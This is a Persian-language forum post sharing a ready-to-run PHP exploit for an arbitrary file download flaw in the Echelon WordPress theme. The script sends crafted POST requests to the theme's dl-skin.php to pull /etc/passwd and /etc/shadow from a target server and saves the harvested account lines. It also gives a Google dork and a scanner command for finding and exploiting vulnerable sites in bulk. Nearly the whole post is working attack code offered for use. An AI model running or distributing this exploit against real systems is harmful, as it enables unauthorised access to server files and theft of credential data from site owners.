باگ موجود در یکی از تم های وردپرس به نام A.F.D WordPress Theme که می توان با استفاده از این باگ، فایل های دلخواه خود را از روی سرور مورد نظر دانلود کرد:
کد:
[php]*Name:* Wordpress A.F.D Theme Echelon / INURL - BRASIL *Description:* This exploit allows attacker to download any writable file from the server *Usage info:* Put the path of the file in the file's field of the exploit ,then click "Download" button then you get the file directly File download /etc/passwd & /etc/shadow Failure consists of exploring a parameter $ _POST file /wp-content/themes/echelon/lib/scripts/dl-skin.php The following fields are exploited for Arbitrary File Download *POST:* _mysite_download_skin={$config['file']}&submit=Download ex: _mysite_download_skin=/etc/passwd&submit=Download *Exploit:* <?php #=============================================================================== # NAME: Wordpress A.F.D Theme Echelon # TIPE: Arbitrary File Download # Google DORK: inurl:/wp-content/themes/echelon # Vendor: www.wordpress.org # Tested on: Linux # EXECUTE: php exploit.php www.alvo.com.br # OUTPUT: EXPLOIT_WPAFD_Echelon.txt # AUTOR: Cleiton Pinheiro # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # GIT: https://github.com/googleinurl # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA # # ------------------------------------------------------------------------------ # Comand Exec Scanner INURLBR: # ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_" # ------------------------------------------------------------------------------ # Download Scanner INURLBR: # https://github.com/googleinurl/SCANNER-INURLBR #=============================================================================== error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); print empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br') : NULL; $argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http:// {$argv[1]}"; !(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i", $argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br') : NULL; $config['line'] = "\n------------------------------------------------------------------------------------------------------------------\n"; $config['alvo'] = $alvo_[0][0]; $config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php"; function __plus() { ob_flush(); flush(); } function __convertUrlQuery($query) { $queryParts = explode('&', $query); $params = array(); foreach ($queryParts as $param) { $item = explode('=', $param); $params[$item[0]] = urlencode($item[1]); } return $params; } function __request_info($curl, $config) { $postDados = __convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download"); foreach ($postDados as $campo => $valor) { $postDados_format .= $campo . '=' . ($valor) . '&'; } $postDados_format = rtrim($postDados_format, '&'); curl_setopt($curl, CURLOPT_POST, count($postDados)); curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format); curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0 (X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/' . md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/' . rand(1, 500) . '.31'); curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] . $config['exploit']); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20); curl_setopt($curl, CURLOPT_HEADER, 1); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $corpo = curl_exec($curl); $server = curl_getinfo($curl); $status = NULL; preg_match_all('(HTTP.*)', $corpo, $status['http']); preg_match_all('(Server:.*)', $corpo, $status['server']); preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']); $info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['Content-Disposition'][0][0]}")); curl_close($curl); unset($curl); return isset($corpo) ? array('corpo' => $corpo, 'server' => $server, 'info' => $info) : FALSE; } function main($config,$rest) { __plus(); print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]: {$config['file']}:\n"; preg_match_all("(root:.*)", $rest['corpo'], $final); preg_match_all("(sbin:.*)", $rest['corpo'], $final__); preg_match_all("(ftp:.*)", $rest['corpo'], $final___); preg_match_all("(nobody:.*)", $rest['corpo'], $final____); preg_match_all("(mail:.*)", $rest['corpo'], $final_____); $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]); $res = NULL; if (preg_match("#root#i", $rest['corpo'])) { $res.= "0x " . date("h:m:s") . " [INFO][IS VULN][RESUME][VALUES]:\n"; $res.=$config['line'] . "\n"; foreach ($_final as $value) { $res.="0x " . date("h:m:s") . " [VALUE]: $value\n"; } $res.=$config['line']; __plus(); file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND); print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n"; } else { print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n"; } } print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n"; $config['file'] = '/etc/passwd'; $rest = __request_info($objcurl = curl_init(), $config); __plus(); print $line; print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n"; print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n"; main($config,$rest); __plus(); $config['file'] = '/etc/shadow'; $rest = __request_info($objcurl = curl_init(), $config); __plus(); main($config,$rest); __plus(); [/php]